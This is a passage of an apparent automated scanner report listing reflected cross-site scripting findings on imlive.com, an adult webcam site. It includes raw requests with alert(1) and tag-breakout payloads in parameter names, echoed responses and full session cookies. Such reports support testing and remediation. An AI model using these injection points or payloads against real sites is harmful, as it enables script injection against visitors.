ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:00 GMT Connection: close Content-Length: 33620 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.74. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/cams-aroundthehouse/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1145a'-alert(1)-'9eeece25a26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:16 GMT Connection: close Content-Length: 33767 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.75. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/caught-on-cam/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3af4"><a>c33137ced61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:56 GMT Connection: close Content-Length: 26092 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.76. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/caught-on-cam/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9d8'-alert(1)-'484051df056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:19 GMT Connection: close Content-Length: 26239 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.77. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7330d'-alert(1)-'69a435aad31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:18 GMT Connection: close Content-Length: 116890 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.78. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f29d6"><a>e94ae201611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/couple/?f29d6"><a>e94ae201611=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:09 GMT Connection: close Content-Length: 116726 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/couple/?f29d6"><a>e94ae201611=1"> ...[SNIP]...
2.79. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/fetish/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb492'-alert(1)-'e05d7866c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:57 GMT Connection: close Content-Length: 214380 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.80. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/fetish/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68a0"><a>c6c73a2ee9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:45 GMT Connection: close Content-Length: 214124 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1"> ...[SNIP]...
2.81. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/fetish/categories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceae9'-alert(1)-'1ae32c8a8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:27 GMT Connection: close Content-Length: 25109 Vary: Accept-Encoding
